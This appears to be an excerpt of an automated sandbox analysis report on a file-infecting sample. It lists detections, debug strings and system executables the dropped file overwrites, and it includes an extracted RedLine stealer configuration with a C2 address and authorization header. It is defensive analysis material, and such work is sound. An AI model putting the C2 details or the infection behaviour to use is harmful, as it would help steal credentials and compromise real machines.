Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Avira: detection malicious, Label: W32/Infector.Gen
Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Avira: detection malicious, Label: W32/Infector.Gen
                        Source: 4.2.Native_Redline_BTC.exe.12ec4d08.4.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["212.162.149.53:2049"], "Bot Id": "FOZ", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                        Source: AENiBH7X1q.exe | ReversingLabs: Detection: 45%
                        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe | Joe Sandbox ML: detected
                        Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe | Joe Sandbox ML: detected
                        Source: AENiBH7X1q.exe | Joe Sandbox ML: detected
                        Source: AENiBH7X1q.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                        Source: unknown | HTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.5:49704 version: TLS 1.2
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb77.GCTL source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: svchost.exe, 00000002.00000003.2102495566.0000000005B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdb source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdb source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdb source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: microsofts.exe, 00000003.00000003.2589946017.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msiexec.pdbGCTL source: microsofts.exe, 00000003.00000003.2218314325.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdb source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdbGCTL source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdb source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdb source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: _.pdb source: microsofts.exe, 00000003.00000003.2107829851.00000000006B6000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdbAAAGCTL source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdbGCTL source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdb source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: MsSense.pdb source: microsofts.exe, 00000003.00000003.2259403992.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdb source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdbGCTL source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb888 source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb((( source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdb source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdbGCTL source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ADelRCP_Exec.pdbCC9 source: microsofts.exe, 00000003.00000003.2608107217.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdb source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: Acrobat_SL.pdb source: microsofts.exe, 00000003.00000003.2472349372.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\PkgInstaller\base\ntsetup\SrvPack.Main\tools\sfxcab\sfxcab\objfre\i386\sfxcab.pdbU source: microsofts.exe, 00000003.00000003.2831331065.00000000005E0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2847723654.00000000005F0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2829725346.00000000008B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdbT source: microsofts.exe, 00000003.00000003.2511558712.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdbGG source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb))) source: microsofts.exe, 00000003.00000003.2463831926.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: mavinject32.pdb source: microsofts.exe, 00000003.00000003.2887150283.00000000008D0000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2890897285.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: PerceptionSimulationService.pdbGCTL source: microsofts.exe, 00000003.00000003.2231923378.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdbGCTL source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: 64BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2745183180.00000000005F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdbGCTL source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdbGCTL source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\dbs\el\omr\Target\x64\ship\click2run\x-none\InspectorOfficeGadget.pdbY source: microsofts.exe, 00000003.00000003.2872096963.0000000000880000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: E:\jenkins\workspace\NGL_WORKFLOW\build\master\win64\Release\Acrobat\project\win\ngl-workflow\x64\Release (Acrobat)\adobe_licensing_wf_helper_acro.pdb source: microsofts.exe, 00000003.00000003.2720656204.00000000005B0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\WCChromeNativeMessagingHost.pdb source: microsofts.exe, 00000003.00000003.2646074377.0000000006A20000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb@@ source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PerfHost.pdb source: microsofts.exe, 00000003.00000003.2236404735.0000000006B00000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2237338416.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2244683522.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\workspace\CR-Windows-x64-Client-Builder\x64\Release\CRWindowsClientService.pdb source: microsofts.exe, 00000003.00000003.2673696878.0000000004FC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: C:\work\p4\splinters\Splinters\S\BuildResults\bin\Win32\ReaderRelease\FullTrustNotifier\FullTrustNotifier.pdb source: microsofts.exe, 00000003.00000003.2769160993.0000000000830000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb346 source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\plug_ins\pi_brokers\MSRMSPIBroker.pdb source: microsofts.exe, 00000003.00000003.2762958327.0000000000870000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: maintenanceservice.pdb` source: microsofts.exe, 00000003.00000003.2200285404.00000000067D0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\Acrobat\Installers\ShowAppPickerForPDF\Release_x64\ShowAppPickerForPDF.pdb$$ source: microsofts.exe, 00000003.00000003.2778209825.0000000000850000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2785772651.00000000005A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: AENiBH7X1q.exe, 00000000.00000003.2101066429.0000000004160000.00000004.00001000.00020000.00000000.sdmp, AENiBH7X1q.exe, 00000000.00000003.2101195930.0000000004300000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdb source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: TieringEngineService.pdbGCTL source: microsofts.exe, 00000003.00000003.2313254349.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: WmiApSrv.pdb source: microsofts.exe, 00000003.00000003.2357680780.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000006.00000002.3520993422.0000000006576000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdb source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb8v= source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: msdtcexe.pdb source: microsofts.exe, 00000003.00000003.2207092698.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: DiagnosticsHub.StandardCollector.Service.pdb source: microsofts.exe, 00000003.00000003.2131039214.00000000069E0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ALG.pdbGCTL source: microsofts.exe, 00000003.00000003.2107943827.00000000050A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: PresentationFontCache.pdbHt^t Pt_CorExeMainmscoree.dll source: microsofts.exe, 00000003.00000003.2164056345.0000000006AC0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: locator.pdbGCTL source: microsofts.exe, 00000003.00000003.2246280427.0000000006B10000.00000004.00001000.00020000.00000000.sdmp, microsofts.exe, 00000003.00000003.2256193933.00000000067C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\AcroBroker.pdbTTT source: microsofts.exe, 00000003.00000003.2491136403.0000000006930000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: FXSSVC.pdbGCTL source: microsofts.exe, 00000003.00000003.2157871233.00000000069F0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: ssh-agent.pdbX source: microsofts.exe, 00000003.00000003.2300579828.0000000006B00000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdb source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb^ source: build.exe, 00000006.00000002.3353405465.00000000015E7000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: snmptrap.pdb source: microsofts.exe, 00000003.00000003.2272309443.0000000006B10000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release\Plug_ins\pi_brokers\32BitMAPIBroker.pdb source: microsofts.exe, 00000003.00000003.2730082068.00000000008C0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: D:\T\BuildResults\bin\Release_x64\Eula.pdb888 source: microsofts.exe, 00000003.00000003.2681750545.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp
                        Source: Binary string: AppVShNotify.pdbGCTL source: microsofts.exe, 00000003.00000003.2867041364.00000000008A0000.00000004.00001000.00020000.00000000.sdmp

                        Spreading

                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\wbem\WmiApSrv.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\pingsender.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\vds.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\alg.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7zFM.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\snmptrap.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Spectrum.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Windows Media Player\wmpnetwk.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\Locator.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7z.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\AppVClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\crashreporter.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\SysWOW64\perfhost.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\7-Zip\7zG.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\msiexec.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\VSSVC.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\wbengine.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\SearchIndexer.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\private_browsing.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\TieringEngineService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\firefox.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Info.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Mozilla Firefox\updater.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files (x86)\AutoIt3\Au3Check.exe
                        Source: C:\Users\user\AppData\Local\Temp\microsofts.exe | System file written: C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe
